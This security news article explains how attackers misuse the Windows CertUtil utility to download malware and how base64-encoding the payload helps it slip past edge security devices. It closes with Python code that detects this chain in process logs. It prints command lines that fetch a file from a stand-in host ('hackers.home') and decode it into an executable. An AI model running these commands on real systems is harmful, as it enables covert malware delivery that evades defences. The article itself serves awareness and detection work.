Windows has a built-in program called CertUtil, which can be used to manage certificates in Windows. Using this program you can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows.
One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file using the syntax "certutil.exe -urlcache -split -f [http] output.file".
Security researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware.
Smith's concerns were warranted as attackers have been utilizing CertUtil to download malware for quite a while. This sample utilized it in 2016 and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to an infected computer.
You may be wondering why attackers would use CertUtil when they already have a foothold on a computer? This is because some computers may be locked down so that unknown applications are unable to download programs. By using a built-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus be allowed to download files.
This use of legitimate Windows programs to download and execute malware is not new, as the Windows regsvr32.exe executable can be used in a similar manner.
Using CertUtil + Base64 to Bypass Security Software
Today security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil that may make it easier for attackers' downloads to remain undetected by edge security devices. The idea is to first base64 encode the malicious file so it appears as harmless text, and then decode it with CertUtil.exe after it has been downloaded.
As already discussed, you can download a file using CertUtil.exe by using the following command:
certutil.exe -urlcache -split -f [http] output.file
This will download the file in its original form and save it to the computer. The problem with this method is that network security devices can detect the file as malicious and block it.
To get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just appears as harmless text. Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file into the executable.
This is illustrated in Mertens' handler diary.
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
This method potentially gets the file past an edge device without being detected; it is then converted back into the executable on the local machine, where it may not be as well protected.
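As an added example, not taken from Mertens' diary or the original article, the Python below shows how a defender can spot the download-then-decode chain in process command-line logs and check whether a downloaded "text" file is really a base64-encoded PE. The sample command lines, the fake PE bytes and the reference to Sysmon EventID 1 / 4688 feeds are constructed assumptions.

```python
import base64
import re

# Constructed sample process-creation command lines (what a Sysmon EventID 1 or 4688 feed carries).
SAMPLE_CMDLINES = [
    'certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt',
    'certutil -store My',
    'certutil.exe -decode bad.txt bad.exe',
]
# Constructed stand-in for a PE file: just the "MZ" header bytes, not a real program.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00"
SAMPLE_TXT = ("-----BEGIN CERTIFICATE-----\n" + base64.b64encode(FAKE_PE).decode()
              + "\n-----END CERTIFICATE-----\n")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def parse_certutil(cmdline):
    """Return (flags, positional args) for a certutil command line, or None for other images."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    image = tokens[0].lower() if tokens else ""
    if image != "certutil" and not image.endswith("certutil.exe"):
        return None
    # certutil takes "-" or "/" as the option prefix and ignores case.
    flags = {t[1:].lower() for t in tokens[1:] if t.startswith(("-", "/"))}
    args = [t for t in tokens[1:] if not t.startswith(("-", "/"))]
    return flags, args


def find_decode_chains(cmdlines):
    """Link 'certutil -urlcache ... URL X' to a later 'certutil -decode X Y'; returns (i, j, Y) tuples."""
    pending, chains = {}, []
    for i, cmd in enumerate(cmdlines):
        parsed = parse_certutil(cmd)
        if parsed is None:
            continue
        flags, args = parsed
        if "urlcache" in flags and len(args) >= 2 and args[0].lower().startswith(("http://", "https://")):
            pending[args[-1].lower()] = i          # last positional is the local output file
        elif "decode" in flags and len(args) >= 2 and args[0].lower() in pending:
            chains.append((pending[args[0].lower()], i, args[1]))
    return chains


def decoded_is_pe(text):
    """True if a downloaded 'text' file is base64 (raw or PEM-wrapped, both accepted by -decode) of a PE."""
    body = "".join(line.strip() for line in text.splitlines() if not line.startswith("-----"))
    try:
        data = base64.b64decode(body, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return data[:2] == b"MZ"
```

The chain detector only needs the command-line field of process-creation events, so it works on exported logs as well as a live feed.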
While I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -decode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this write-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows.